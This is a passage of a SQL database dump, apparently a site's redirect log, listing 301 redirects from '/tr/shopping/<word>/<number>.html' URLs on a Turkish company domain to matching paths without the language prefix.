00:00:00',301),(79201,'https://3s-technologies.com.tr/tr/shopping/insubstantial/1093255393.html',NULL,'https://3s-technologies.com.tr/shopping/insubstantial/1093255393.html','',1,0,'2026-06-11 22:19:08','0000-00-00 00:00:00',301),(79202,'https://3s-technologies.com.tr/tr/shopping/innocently/756372333.html',NULL,'https://3s-technologies.com.tr/shopping/innocently/756372333.html','',1,0,'2026-06-11 22:19:10','0000-00-00 00:00:00',301),(79203,'https://3s-technologies.com.tr/tr/shopping/manchet/3631280018.html',NULL,'https://3s-technologies.com.tr/shopping/manchet/3631280018.html','',1,0,'2026-06-11 22:19:13','0000-00-00 00:00:00',301),(79204,'https://3s-technologies.com.tr/tr/shopping/picoid/1526573342.html',NULL,'https://3s-technologies.com.tr/shopping/picoid/1526573342.html','',1,0,'2026-06-11 22:19:16','0000-00-00 00:00:00',301),(79205,'https://3s-technologies.com.tr/tr/shopping/thessalian/432749059.html',NULL,'https://3s-technologies.com.tr/shopping/thessalian/432749059.html','',1,0,'2026-06-11 22:19:20','0000-00-00 00:00:00',301),(79206,'https://3s-technologies.com.tr/tr/shopping/suretyship/2520413981.html',NULL,'https://3s-technologies.com.tr/shopping/suretyship/2520413981.html','',1,0,'2026-06-11 22:19:23','0000-00-00 00:00:00',301),(79207,'https://3s-technologies.com.tr/tr/shopping/gloominess/2136105209.html',NULL,'https://3s-technologies.com.tr/shopping/gloominess/2136105209.html','',1,0,'2026-06-11 22:19:25','0000-00-00 00:00:00',301),(79208,'https://3s-technologies.com.tr/tr/shopping/gazeful/1170146783.html',NULL,'https://3s-technologies.com.tr/shopping/gazeful/1170146783.html','',1,0,'2026-06-11 22:19:28','0000-00-00 00:00:00',301),(79209,'https://3s-technologies.com.tr/tr/shopping/cinosternon/1214921055.html',NULL,'https://3s-technologies.com.tr/shopping/cinosternon/1214921055.html','',1,0,'2026-06-11 22:19:31','0000-00-00 00:00:00',301),(79210,'https://3s-technologies.com.tr/tr/shopping/echinospermum/3933063787.html',NULL,'https://3s-technologies.com.tr/shopping/echinospermum/3933063787.html','',1,0,'2026-06-11 22:19:34','0000-00-00 00:00:00',301),(79211,'https://3s-technologies.com.tr/tr/shopping/jackdaw/1478376973.html',NULL,'https://3s-technologies.com.tr/shopping/jackdaw/1478376973.html','',1,0,'2026-06-11 22:19:37','0000-00-00 00:00:00',301),(79212,'https://3s-technologies.com.tr/tr/shopping/retired/2810771726.html',NULL,'https://3s-technologies.com.tr/shopping/retired/2810771726.html','',1,0,'2026-06-11 22:19:40','0000-00-00 00:00:00',301),(79213,'https://3s-technologies.com.tr/tr/shopping/onobrychis/70339810.html',NULL,'https://3s-technologies.com.tr/shopping/onobrychis/70339810.html','',1,0,'2026-06-11 22:19:43','0000-00-00 00:00:00',301),(79214,'https://3s-technologies.com.tr/tr/shopping/manikin/610818481.html',NULL,'https://3s-technologies.com.tr/shopping/manikin/610818481.html','',1,0,'2026-06-11 22:19:46','0000-00-00 00:00:00',301),(79215,'https://3s-technologies.com.tr/tr/shopping/influencive/2882063402.html',NULL,'https://3s-technologies.com.tr/shopping/influencive/2882063402.html','',1,0,'2026-06-11 22:19:58','0000-00-00 00:00:00',301),(79216,'https://3s-technologies.com.tr/tr/shopping/sermocination/3339198836.html',NULL,'https://3s-technologies.com.tr/shopping/sermocination/3339198836.html','',1,0,'2026-06-11 22:20:02','0000-00-00 00:00:00',301),(79217,'https://3s-technologies.com.tr/tr/shopping/dyehouse/3737690788.html',NULL,'https://3s-technologies.com.tr/shopping/dyehouse/3737690788.html','',1,0,'2026-06-11 22:20:08','0000-00-00 00:00:00',301),(79218,'https://3s-technologies.com.tr/tr/shopping/caimacam/1971091574.html',NULL,'https://3s-technologies.com.tr/shopping/caimacam/1971091574.html','',1,0,'2026-06-11 22:20:15','0000-00-00 00:00:00',301),(79219,'https://3s-technologies.com.tr/tr/shopping/acyclic/2976434903.html',NULL,'https://3s-technologies.com.tr/shopping/acyclic/2976434903.html','',1,0,'2026-06-11 22:20:19','0000-00-00 00:00:00',301),(79220,'https://3s-technologies.com.tr/tr/shopping/railing/276075597.html',NULL,'https://3s-technologies.com.tr/shopping/railing/276075597.html','',1,0,'2026-06-11 22:20:22','0000-00-00 00:00:00',301),(79221,'https://3s-technologies.com.tr/tr/shopping/quartenylic/4018477997.html',NULL,'https://3s-technologies.com.tr/shopping/quartenylic/4018477997.html','',1,0,'2026-06-11 22:20:26','0000-00-00 00:00:00',301),(79222,'https://3s-technologies.com.tr/tr/shopping/globator/1572179791.html',NULL,'https://3s-technologies.com.tr/shopping/globator/1572179791.html','',1,0,'2026-06-11 22:20:28','0000-00-00 00:00:00',301),(79223,'https://3s-technologies.com.tr/tr/shopping/poebird/2603007158.html',NULL,'https://3s-technologies.com.tr/shopping/poebird/2603007158.html','',1,0,'2026-06-11 22:20:31','0000-00-00 00:00:00',301),(79224,'https://3s-technologies.com.tr/tr/shopping/policing/1406512739.html',NULL,'https://3s-technologies.com.tr/shopping/policing/1406512739.html','',1,0,'2026-06-11 22:20:37','0000-00-00 00:00:00',301),(79225,'https://3s-technologies.com.tr/tr/shopping/delphinic/4175787946.html',NULL,'https://3s-technologies.com.tr/shopping/delphinic/4175787946.html','',1,0,'2026-06-11 22:20:41','0000-00-00 00:00:00',301),(79226,'https://3s-technologies.com.tr/tr/shopping/overlordship/352708223.html',NULL,'https://3s-technologies.com.tr/shopping/overlordship/352708223.html','',1,0,'2026-06-11 22:20:44','0000-00-00 00:00:00',301),(79227,'https://3s-technologies.com.tr/tr/shopping/veniality/1105842926.html',NULL,'https://3s-technologies.com.tr/shopping/veniality/1105842926.html','',1,0,'2026-06-11 22:20:47','0000-00-00 00:00:00',301),(79228,'https://3s-technologies.com.tr/tr/shopping/maggotish/3931292173.html',NULL,'https://3s-technologies.com.tr/shopping/maggotish/3931292173.html','',1,0,'2026-06-11 22:20:49','0000-00-00 00:00:00',301),(79229,'https://3s-technologies.com.tr/tr/shopping/grandson/1826877136.html',NULL,'https://3s-technologies.com.tr/shopping/grandson/1826877136.html','',1,0,'2026-06-11 22:20:53','0000-00-00 00:00:00',301),(79230,'https://3s-technologies.com.tr/tr/shopping/hangar/338976439.html',NULL,'https://3s-technologies.com.tr/shopping/hangar/338976439.html','',1,0,'2026-06-11 22:20:55','0000-00-00 00:00:00',301),(79231,'https://3s-technologies.com.tr/tr/shopping/unvicar/1929419157.html',NULL,'https://3s-technologies.com.tr/shopping/unvicar/1929419157.html','',1,0,'2026-06-11 22:20:59','0000-00-00 00:00:00',301),(79232,'https://3s-technologies.com.tr/tr/shopping/paperclip/3076031682.html',NULL,'https://3s-technologies.com.tr/shopping/paperclip/3076031682.html','',1,0,'2026-06-11 22:21:02','0000-00-00 00:00:00',301),(79233,'https://3s-technologies.com.tr/tr/shopping/thenardite/1005715685.html',NULL,'https://3s-technologies.com.tr/shopping/thenardite/1005715685.html','',1,0,'2026-06-11 22:21:05','0000-00-00 00:00:00',301),(79234,'https://3s-technologies.com.tr/tr/shopping/glassmakers/721188827.html',NULL,'https://3s-technologies.com.tr/shopping/glassmakers/721188827.html','',1,0,'2026-06-11 22:21:08','0000-00-00 00:00:00',301),(79235,'https://3s-technologies.com.tr/tr/shopping/nisus/2223085385.html',NULL,'https://3s-technologies.com.tr/shopping/nisus/2223085385.html','',1,0,'2026-06-11 22:21:10','0000-00-00 00:00:00',301),(79236,'https://3s-technologies.com.tr/tr/shopping/immersionist/2130400407.html',NULL,'https://3s-technologies.com.tr/shopping/immersionist/2130400407.html','',1,0,'2026-06-11 22:21:16','0000-00-00 00:00:00',301),(79237,'https://3s-technologies.com.tr/tr/shopping/deliver/2038885767.html',NULL,'https://3s-technologies.com.tr/shopping/deliver/2038885767.html','',1,0,'2026-06-11 22:21:20','0000-00-00 00:00:00',301),(79238,'https://3s-technologies.com.tr/tr/shopping/saltate/2650090555.html',NULL,'https://3s-technologies.com.tr/shopping/saltate/2650090555.html','',1,0,'2026-06-11 22:21:23','0000-00-00 00:00:00',301),(79239,'https://3s-technologies.com.tr/tr/shopping/genealogical/2037202555.html',NULL,'https://3s-technologies.com.tr/shopping/genealogical/2037202555.html','',1,0,'2026-06-11 22:21:26','0000-00-00 00:00:00',301),(79240,'https://3s-technologies.com.tr/tr/shopping/panchway/3402879550.html',NULL,'https://3s-technologies.com.tr/shopping/panchway/3402879550.html','',1,0,'2026-06-11 22:21:29','0000-00-00 00:00:00',301),(79241,'https://3s-technologies.com.tr/tr/shopping/juggleress/3157461167.html',NULL,'https://3s-technologies.com.tr/shopping/juggleress/3157461167.html','',1,0,'2026-06-11 22:21:32','0000-00-00 00:00:00',301),(79242,'https://3s-technologies.com.tr/tr/shopping/corallodendron/2624001551.html',NULL,'https://3s-technologies.com.tr/shopping/corallodendron/2624001551.html','',1,0,'2026-06-11 22:21:35','0000-00-00 00:00:00',301),(79243,'https://3s-technologies.com.tr/tr/shopping/vaccina/415048663.html',NULL,'https://3s-technologies.com.tr/shopping/vaccina/415048663.html','',1,0,'2026-06-11 22:21:38','0000-00-00 00:00:00',301),(79244,'https://3s-technologies.com.tr/tr/shopping/benefited/3498897619.html',NULL,'https://3s-technologies.com.tr/shopping/benefited/3498897619.html','',1,0,'2026-06-11 22:21:41','0000-00-00 00:00:00',301),(79245,'https://3s-technologies.com.tr/tr/shopping/dissentient/1988350559.html',NULL,'https://3s-technologies.com.tr/shopping/dissentient/1988350559.html','',1,0,'2026-06-11 22:21:44','0000-00-00 00:00:00',301),(79246,'https://3s-technologies.com.tr/tr/shopping/ratchet/1700459163.html',NULL,'https://3s-technologies.com.tr/shopping/ratchet/1700459163.html','',1,0,'2026-06-11 22:21:47','0000-00-00 00:00:00',301),(79247,'https://3s-technologies.com.tr/tr/shopping/legitimatize/3884877430.html',NULL,'https://3s-technologies.com.tr/shopping/legitimatize/3884877430.html','',1,0,'2026-06-11 22:21:50','0000-00-00 00:00:00',301),(79248,'https://3s-technologies.com.tr/tr/shopping/stilar/2044119456.html',NULL,'https://3s-technologies.com.tr/shopping/stilar/2044119456.html','',1,0,'2026-06-11 22:21:53','0000-00-00 00:00:00',301),(79249,'https://3s-technologies.com.tr/tr/shopping/lymantriid/57584286.html',NULL,'https://3s-technologies.com.tr/shopping/lymantriid/57584286.html','',1,0,'2026-06-11 22:21:56','0000-00-00 00:00:00',301),(79250,'https://3s-technologies.com.tr/tr/shopping/coverture/4269414230.html',NULL,'https://3s-technologies.com.tr/shopping/coverture/4269414230.html','',1,0,'2026-06-11 22:21:59','0000-00-00 00:00:00',301),(79251,'https://3s-technologies.com.tr/tr/shopping/melanochroite/945789459.html',NULL,'https://3s-technologies.com.tr/shopping/melanochroite/945789459.html','',1,0,'2026-06-11 22:22:02','0000-00-00 00:00:00',301),(79252,'https://3s-technologies.com.tr/tr/shopping/trigonia/3425809048.html',NULL,'https://3s-technologies.com.tr/shopping/trigonia/3425809048.html','',1,0,'2026-06-11 22:22:05','0000-00-00 00:00:00',301),(79253,'https://3s-technologies.com.tr/tr/shopping/kittacincla/871891750.html',NULL,'https://3s-technologies.com.tr/shopping/kittacincla/871891750.html','',1,0,'2026-06-11 22:22:08','0000-00-00 00:00:00',301),(79254,'https://3s-technologies.com.tr/tr/shopping/butthorn/3861151935.html',NULL,'https://3s-technologies.com.tr/shopping/butthorn/3861151935.html','',1,0,'2026-06-11 22:22:11','0000-00-00 00:00:00',301),(79255,'https://3s-technologies.com.tr/tr/shopping/motile/1665799716.html',NULL,'https://3s-technologies.com.tr/shopping/motile/1665799716.html','',1,0,'2026-06-11 22:22:14','0000-00-00 00:00:00',301),(79256,'https://3s-technologies.com.tr/tr/shopping/emiction/3808021436.html',NULL,'https://3s-technologies.com.tr/shopping/emiction/3808021436.html','',1,0,'2026-06-11 22:22:22','0000-00-00 00:00:00',301),(79257,'https://3s-technologies.com.tr/tr/shopping/raveling/1821341126.html',NULL,'https://3s-technologies.com.tr/shopping/raveling/1821341126.html','',1,0,'2026-06-11 22:22:29','0000-00-00 00:00:00',301),(79258,'https://3s-technologies.com.tr/tr/shopping/mineralogically/1089095021.html',NULL,'https://3s-technologies.com.tr/shopping/mineralogically/1089095021.html','',1,0,'2026-06-11 22:22:31','0000-00-00 00:00:00',301),(79259,'https://3s-technologies.com.tr/tr/shopping/aversation/3001136058.html',NULL,'https://3s-technologies.com.tr/shopping/aversation/3001136058.html','',1,0,'2026-06-11 22:22:34','0000-00-00 00:00:00',301),(79260,'https://3s-technologies.com.tr/tr/shopping/hawse/1783305022.html',NULL,'https://3s-technologies.com.tr/shopping/hawse/1783305022.html','',1,0,'2026-06-11 22:22:37','0000-00-00 00:00:00',301),(79261,'https://3s-technologies.com.tr/tr/shopping/antiloquy/2657615433.html',NULL,'https://3s-technologies.com.tr/shopping/antiloquy/2657615433.html','',1,0,'2026-06-11 22:22:40','0000-00-00 00:00:00',301),(79262,'https://3s-technologies.com.tr/tr/shopping/skimmer/1219897578.html',NULL,'https://3s-technologies.com.tr/shopping/skimmer/1219897578.html','',1,0,'2026-06-11 22:22:43','0000-00-00 00:00:00',301),(79263,'https://3s-technologies.com.tr/tr/shopping/zaffir/1277262398.html',NULL,'https://3s-technologies.com.tr/shopping/zaffir/1277262398.html','',1,0,'2026-06-11 22:22:46','0000-00-00 00:00:00',301),(79264,'https://3s-technologies.com.tr/tr/shopping/shakerism/1627204054.html',NULL,'https://3s-technologies.com.tr/shopping/shakerism/1627204054.html','',1,0,'2026-06-11 22:22:49','0000-00-00 00:00:00',301),(79265,'https://3s-technologies.com.tr/tr/shopping/wicken/2237239516.html',NULL,'https://3s-technologies.com.tr/shopping/wicken/2237239516.html','',1,0,'2026-06-11 22:22:52','0000-00-00 00:00:00',301),(79266,'https://3s-technologies.com.tr/tr/shopping/recountment/3410062128.html',NULL,'https://3s-technologies.com.tr/shopping/recountment/3410062128.html','',1,0,'2026-06-11 22:22:55','0000-00-00 00:00:00',301),(79267,'https://3s-technologies.com.tr/tr/shopping/catercousin/313290412.html',NULL,'https://3s-technologies.com.tr/shopping/catercousin/313290412.html','',1,0,'2026-06-11 22:22:59','0000-00-00 00:00:00',301),(79268,'https://3s-technologies.com.tr/tr/shopping/chinook/881638912.html',NULL,'https://3s-technologies.com.tr/shopping/chinook/881638912.html','',1,0,'2026-06-11 22:23:01','0000-00-00 00:00:00',301),(79269,'https://3s-technologies.com.tr/tr/shopping/depredating/1247811915.html',NULL,'https://3s-technologies.com.tr/shopping/depredating/1247811915.html','',1,0,'2026-06-11 22:23:04','0000-00-00 00:00:00',301),(79270,'https://3s-technologies.com.tr/tr/shopping/winsomest/599661963.html',NULL,'https://3s-technologies.com.tr/shopping/winsomest/599661963.html','',1,0,'2026-06-11 22:23:07','0000-00-00 00:00:00',301),(79271,'https://3s-technologies.com.tr/tr/shopping/unresty/3239676006.html',NULL,'https://3s-technologies.com.tr/shopping/unresty/3239676006.html','',1,0,'2026-06-11 22:23:10','0000-00-00 00:00:00',301),(79272,'https://3s-technologies.com.tr/tr/shopping/arthrotome/4270427366.html',NULL,'https://3s-technologies.com.tr/shopping/arthrotome/4270427366.html','',1,0,'2026-06-11 22:23:13','0000-00-00 00:00:00',301),(79273,'https://3s-technologies.com.tr/tr/shopping/hyena/1646242352.html',NULL,'https://3s-technologies.com.tr/shopping/hyena/1646242352.html','',1,0,'2026-06-11 22:23:16','0000-00-00 00:00:00',301),(79274,'https://3s-technologies.com.tr/tr/shopping/frabbit/1520772439.html',NULL,'https://3s-technologies.com.tr/shopping/frabbit/1520772439.html','',1,0,'2026-06-11 22:23:19','0000-00-00 00:00:00',301),(79275,'https://3s-technologies.com.tr/tr/shopping/prosodial/2909805948.html',NULL,'https://3s-technologies.com.tr/shopping/prosodial/2909805948.html','',1,0,'2026-06-11 22:23:22','0000-00-00 00:00:00',301),(79276,'https://3s-technologies.com.tr/tr/shopping/lychins/1544233803.html',NULL,'https://3s-technologies.com.tr/shopping/lychins/1544233803.html','',1,0,'2026-06-11 22:23:25','0000-00-00 00:00:00',301),(79277,'https://3s-technologies.com.tr/tr/shopping/pettifogged/3221287602.html',NULL,'https://3s-technologies.com.tr/shopping/pettifogged/3221287602.html','',1,0,'2026-06-11 22:23:28','0000-00-00 00:00:00',301),(79278,'https://3s-technologies.com.tr/tr/shopping/colorableness/2273446344.html',NULL,'https://3s-technologies.com.tr/shopping/colorableness/2273446344.html','',1,0,'2026-06-11 22:23:32','0000-00-00 00:00:00',301),(79279,'https://3s-technologies.com.tr/tr/shopping/invertebral/3176940876.html',NULL,'https://3s-technologies.com.tr/shopping/invertebral/3176940876.html','',1,0,'2026-06-11 22:23:34','0000-00-00 00:00:00',301),(79280,'https://3s-technologies.com.tr/tr/shopping/collegian/539951362.html',NULL,'https://3s-technologies.com.tr/shopping/collegian/539951362.html','',1,0,'2026-06-11 22:23:37','0000-00-00 00:00:00',301),(79281,'https://3s-technologies.com.tr/tr/shopping/mealiness/4098478914.html',NULL,'https://3s-technologies.com.tr/shopping/mealiness/4098478914.html','',1,0,'2026-06-11 22:23:41','0000-00-00 00:00:00',301),(79282,'https://3s-technologies.com.tr/tr/shopping/calisaya/834248579.html',NULL,'https://3s-technologies.com.tr/shopping/calisaya/834248579.html','',1,0,'2026-06-11 22:23:47','0000-00-00 00:00:00',301),(79283,'https://3s-technologies.com.tr/tr/shopping/sporter/1509044896.html',NULL,'','',1,0,'2026-06-11 22:23:48','0000-00-00 00:00:00',301),(79284,'https://3s-technologies.com.tr/tr/shopping/pluviograph/1210332267.html',NULL,'https://3s-technologies.com.tr/shopping/pluviograph/1210332267.html','',1,0,'2026-06-11 22:23:50','0000-00-00 00:00:00',301),(79285,'https://3s-technologies.com.tr/tr/shopping/barbicel/1791005590.html',NULL,'https://3s-technologies.com.tr/shopping/barbicel/1791005590.html','',1,0,'2026-06-11 22:23:53','0000-00-00 00:00:00',301),(79286,'https://3s-technologies.com.tr/tr/shopping/disembodied/2611401851.html',NULL,'https://3s-technologies.com.tr/shopping/disembodied/2611401851.html','',1,0,'2026-06-11 22:23:56','0000-00-00 00:00:00',301),(79287,'https://3s-technologies.com.tr/tr/shopping/gunstock/120700769.html',NULL,'https://3s-technologies.com.tr/shopping/gunstock/120700769.html','',1,0,'2026-06-11 22:23:59','0000-00-00 00:00:00',301),(79288,'https://3s-technologies.com.tr/tr/shopping/fustianist/1989562658.html',NULL,'https://3s-technologies.com.tr/shopping/fustianist/1989562658.html','',1,0,'2026-06-11 22:24:02','0000-00-00 00:00:00',301),(79289,'https://3s-technologies.com.tr/tr/shopping/annats/1083914278.html',NULL,'https://3s-technologies.com.tr/shopping/annats/1083914278.html','',1,0,'2026-06-11 22:24:05','0000-00-00 00:00:00',301),(79290,'https://3s-technologies.com.tr/tr/shopping/diploblastic/611041849.html',NULL,'https://3s-technologies.com.tr/shopping/diploblastic/611041849.html','',1,0,'2026-06-11 22:24:08','0000-00-00 00:00:00',301),(79291,'https://3s-technologies.com.tr/tr/shopping/wrested/1024417039.html',NULL,'https://3s-technologies.com.tr/shopping/wrested/1024417039.html','',1,0,'2026-06-11 22:24:11','0000-00-00 00:00:00',301),(79292,'https://3s-technologies.com.tr/tr/shopping/gastromyces/1331783729.html',NULL,'https://3s-technologies.com.tr/shopping/gastromyces/1331783729.html','',1,0,'2026-06-11 22:24:14','0000-00-00 00:00:00',301),(79293,'https://3s-technologies.com.tr/tr/shopping/wived/2613566425.html',NULL,'https://3s-technologies.com.tr/shopping/wived/2613566425.html','',1,0,'2026-06-11 22:24:17','0000-00-00 00:00:00',301),(79294,'https://3s-technologies.com.tr/tr/shopping/hermaphrodeity/915681166.html',NULL,'https://3s-technologies.com.tr/shopping/hermaphrodeity/915681166.html','',1,0,'2026-06-11 22:24:20','0000-00-00 00:00:00',301),(79295,'https://3s-technologies.com.tr/tr/shopping/cteniza/3100530848.html',NULL,'https://3s-technologies.com.tr/shopping/cteniza/3100530848.html','',1,0,'2026-06-11 22:24:23','0000-00-00 00:00:00',301),(79296,'https://3s-technologies.com.tr/tr/shopping/injucundity/4033997690.html',NULL,'https://3s-technologies.com.tr/shopping/injucundity/4033997690.html','',1,0,'2026-06-11 22:24:26','0000-00-00 00:00:00',301),(79297,'https://3s-technologies.com.tr/tr/shopping/nemichthys/2306762534.html',NULL,'https://3s-technologies.com.tr/shopping/nemichthys/2306762534.html','',1,0,'2026-06-11 22:24:29','0000-00-00 00:00:00',301),(79298,'https://3s-technologies.com.tr/tr/shopping/platypus/614418538.html',NULL,'https://3s-technologies.com.tr/shopping/platypus/614418538.html','',1,0,'2026-06-11 22:24:32','0000-00-00 00:00:00',301),(79299,'https://3s-technologies.com.tr/tr/shopping/foremilk/450267636.html',NULL,'https://3s-technologies.com.tr/shopping/foremilk/450267636.html','',1,0,'2026-06-11 22:24:35','0000-00-00 00:00:00',301),(79300,'https://3s-technologies.com.tr/tr/shopping/hygrometry/162376256.html',NULL,'https://3s-technologies.com.tr/shopping/hygrometry/162376256.html','',1,0,'2026-06-11 22:24:38','0000-00-00 00:00:00',301),(79301,'https://3s-technologies.com.tr/tr/shopping/contrariously/385368786.html',NULL,'https://3s-technologies.com.tr/shopping/contrariously/385368786.html','',1,0,'2026-06-11 22:24:41','0000-00-00 00:00:00',301),(79302,'https://3s-technologies.com.tr/tr/shopping/haematachometry/44857939.html',NULL,'https://3s-technologies.com.tr/shopping/haematachometry/44857939.html','',1,0,'2026-06-11 22:24:44','0000-00-00 00:00:00',301),(79303,'https://3s-technologies.com.tr/tr/shopping/phillippine/1317690319.html',NULL,'https://3s-technologies.com.tr/shopping/phillippine/1317690319.html','',1,0,'2026-06-11 22:24:47','0000-00-00 00:00:00',301),(79304,'https://3s-technologies.com.tr/tr/shopping/littleness/1539684934.html',NULL,'https://3s-technologies.com.tr/shopping/littleness/1539684934.html','',1,0,'2026-06-11 22:24:50','0000-00-00 00:00:00',301),(79305,'https://3s-technologies.com.tr/tr/shopping/astyllen/3184339123.html',NULL,'https://3s-technologies.com.tr/shopping/astyllen/3184339123.html','',1,0,'2026-06-11 22:24:53','0000-00-00 00:00:00',301),(79306,'https://3s-technologies.com.tr/tr/shopping/zoetrope/261115403.html',NULL,'https://3s-technologies.com.tr/shopping/zoetrope/261115403.html','',1,0,'2026-06-11 22:24:56','0000-00-00 00:00:00',301),(79307,'https://3s-technologies.com.tr/tr/shopping/oracle/4181588849.html',NULL,'https://3s-technologies.com.tr/shopping/oracle/4181588849.html','',1,0,'2026-06-11 22:24:59','0000-00-00 00:00:00',301),(79308,'https://3s-technologies.com.tr/tr/shopping/ostia/3802220533.html',NULL,'https://3s-technologies.com.tr/shopping/ostia/3802220533.html','',1,0,'2026-06-11 22:25:02','0000-00-00 00:00:00',301),(79309,'https://3s-technologies.com.tr/tr/shopping/monoplastic/3166638727.html',NULL,'https://3s-technologies.com.tr/shopping/monoplastic/3166638727.html','',1,0,'2026-06-11 22:25:05','0000-00-00 00:00:00',301),(79310,'https://3s-technologies.com.tr/tr/shopping/besiege/237614104.html',NULL,'https://3s-technologies.com.tr/shopping/besiege/237614104.html','',1,0,'2026-06-11 22:25:08','0000-00-00 00:00:00',301),(79311,'https://3s-technologies.com.tr/tr/shopping/tradesman/2086956365.html',NULL,'https://3s-technologies.com.tr/shopping/tradesman/2086956365.html','',1,0,'2026-06-11 22:25:11','0000-00-00 00:00:00',301),(79312,'https://3s-technologies.com.tr/tr/shopping/heptene/1378818660.html',NULL,'https://3s-technologies.com.tr/shopping/heptene/1378818660.html','',1,0,'2026-06-11 22:25:14','0000-00-00 00:00:00',301),(79313,'https://3s-technologies.com.tr/tr/shopping/photog/2233638583.html',NULL,'https://3s-technologies.com.tr/shopping/photog/2233638583.html','',1,0,'2026-06-11 22:25:17','0000-00-00 00:00:00',301),(79314,'https://3s-technologies.com.tr/tr/shopping/birdikin/4222772216.html',NULL,'https://3s-technologies.com.tr/shopping/birdikin/4222772216.html','',1,0,'2026-06-11 22:25:20','0000-00-00 00:00:00',301),(79315,'https://3s-technologies.com.tr/tr/shopping/pedestrial/2938401782.html',NULL,'https://3s-technologies.com.tr/shopping/pedestrial/2938401782.html','',1,0,'2026-06-11 22:25:23','0000-00-00 00:00:00',301),(79316,'https://3s-technologies.com.tr/tr/shopping/gipsywort/3219738707.html',NULL,'https://3s-technologies.com.tr/shopping/gipsywort/3219738707.html','',1,0,'2026-06-11 22:25:28','0000-00-00 00:00:00',301),(79317,'https://3s-technologies.com.tr/tr/shopping/plagiostomatous/1691039067.html',NULL,'https://3s-technologies.com.tr/shopping/plagiostomatous/1691039067.html','',1,0,'2026-06-11 22:25:32','0000-00-00 00:00:00',301),(79318,'https://3s-technologies.com.tr/tr/shopping/hygienist/2847283860.html',NULL,'https://3s-technologies.com.tr/shopping/hygienist/2847283860.html','',1,0,'2026-06-11 22:25:35','0000-00-00 00:00:00',301),(79319,'https://3s-technologies.com.tr/tr/shopping/guizotia/2519201866.html',NULL,'https://3s-technologies.com.tr/shopping/guizotia/2519201866.html','',1,0,'2026-06-11 22:25:38','0000-00-00 00:00:00',301),(79320,'https://3s-technologies.com.tr/tr/shopping/privatdozent/2303126253.html',NULL,'https://3s-technologies.com.tr/shopping/privatdozent/2303126253.html','',1,0,'2026-06-11 22:25:41','0000-00-00 00:00:00',301),(79321,'https://3s-technologies.com.tr/tr/shopping/dongola/1692251166.html',NULL,'https://3s-technologies.com.tr/shopping/dongola/1692251166.html','',1,0,'2026-06-11 22:25:44','0000-00-00 00:00:00',301),(79322,'https://3s-technologies.com.tr/tr/shopping/mississippian/1673584480.html',NULL,'https://3s-technologies.com.tr/shopping/mississippian/1673584480.html','',1,0,'2026-06-11 22:25:47','0000-00-00 00:00:00',301),(79323,'https://3s-technologies.com.tr/tr/shopping/actinias/2482740275.html',NULL,'https://3s-technologies.com.tr/shopping/actinias/2482740275.html','',1,0,'2026-06-11 22:25:50','0000-00-00 00:00:00',301),(79324,'https://3s-technologies.com.tr/tr/shopping/suspensoria/2142773943.html',NULL,'https://3s-technologies.com.tr/shopping/suspensoria/2142773943.html','',1,0,'2026-06-11 22:25:53','0000-00-00 00:00:00',301),(79325,'https://3s-technologies.com.tr/tr/shopping/portuary/4024278868.html',NULL,'https://3s-technologies.com.tr/shopping/portuary/4024278868.html','',1,0,'2026-06-11 22:25:56','0000-00-00 00:00:00',301),(79326,'https://3s-technologies.com.tr/tr/shopping/outvie/1501089272.html',NULL,'https://3s-technologies.com.tr/shopping/outvie/1501089272.html','',1,0,'2026-06-11 22:25:59','0000-00-00 00:00:00',301),(79327,'https://3s-technologies.com.tr/tr/shopping/mischanceful/3677154327.html',NULL,'https://3s-technologies.com.tr/shopping/mischanceful/3677154327.html','',1,0,'2026-06-11 22:26:02','0000-00-00 00:00:00',301),(79328,'https://3s-technologies.com.tr/tr/shopping/photinia/683117224.html',NULL,'https://3s-technologies.com.tr/shopping/photinia/683117224.html','',1,0,'2026-06-11 22:26:05','0000-00-00 00:00:00',301),(79329,'https://3s-technologies.com.tr/tr/shopping/neelghau/183271522.html',NULL,'https://3s-technologies.com.tr/shopping/neelghau/183271522.html','',1,0,'2026-06-11 22:26:08','0000-00-00 00:00:00',301),(79330,'https://3s-technologies.com.tr/tr/shopping/oynoun/2441539820.html',NULL,'https://3s-technologies.com.tr/shopping/oynoun/2441539820.html','',1,0,'2026-06-11 22:26:11','0000-00-00 00:00:00',301),(79331,'https://3s-technologies.com.tr/tr/shopping/delirant/2375428839.html',NULL,'https://3s-technologies.com.tr/shopping/delirant/2375428839.html','',1,0,'2026-06-11 22:26:14','0000-00-00 00:00:00',301),(79332,'https://3s-technologies.com.tr/tr/shopping/complaisantness/2624724589.html',NULL,'https://3s-technologies.com.tr/shopping/complaisantness/2624724589.html','',1,0,'2026-06-11 22:26:17','0000-00-00 00:00:00',301),(79333,'https://3s-technologies.com.tr/tr/shopping/pastorship/1742854629.html',NULL,'https://3s-technologies.com.tr/shopping/pastorship/1742854629.html','',1,0,'2026-06-11 22:26:21','0000-00-00 00:00:00',301),(79334,'https://3s-technologies.com.tr/tr/shopping/cheiranthus/1818748120.html',NULL,'https://3s-technologies.com.tr/shopping/cheiranthus/1818748120.html','',1,0,'2026-06-11 22:26:23','0000-00-00 00:00:00',301),(79335,'https://3s-technologies.com.tr/tr/shopping/parergon/727513789.html',NULL,'https://3s-technologies.com.tr/shopping/parergon/727513789.html','',1,0,'2026-06-11 22:26:26','0000-00-00 00:00:00',301),(79336,'https://3s-technologies.com.tr/tr/shopping/presupposed/3109871947.html',NULL,'https://3s-technologies.com.tr/shopping/presupposed/3109871947.html','',1,0,'2026-06-11 22:26:29','0000-00-00 00:00:00',301),(79337,'https://3s-technologies.com.tr/tr/shopping/burlettas/2110457648.html',NULL,'https://3s-technologies.com.tr/shopping/burlettas/2110457648.html','',1,0,'2026-06-11 22:26:32','0000-00-00 00:00:00',301),(79338,'https://3s-technologies.com.tr/tr/shopping/ridiculous/446890947.html',NULL,'https://3s-technologies.com.tr/shopping/ridiculous/446890947.html','',1,0,'2026-06-11 22:26:35','0000-00-00 00:00:00',301),(79339,'https://3s-technologies.com.tr/tr/shopping/ichnology/3303979863.html',NULL,'https://3s-technologies.com.tr/shopping/ichnology/3303979863.html','',1,0,'2026-06-11 22:26:39','0000-00-00 00:00:00',301),(79340,'https://3s-technologies.com.tr/tr/shopping/caroche/1542109148.html',NULL,'https://3s-technologies.com.tr/shopping/caroche/1542109148.html','',1,0,'2026-06-11 22:26:41','0000-00-00 00:00:00',301),(79341,'https://3s-technologies.com.tr/tr/shopping/dividingprenominal/3783489873.html',NULL,'https://3s-technologies.com.tr/shopping/dividingprenominal/3783489873.html','',1,0,'2026-06-11 22:26:44','0000-00-00 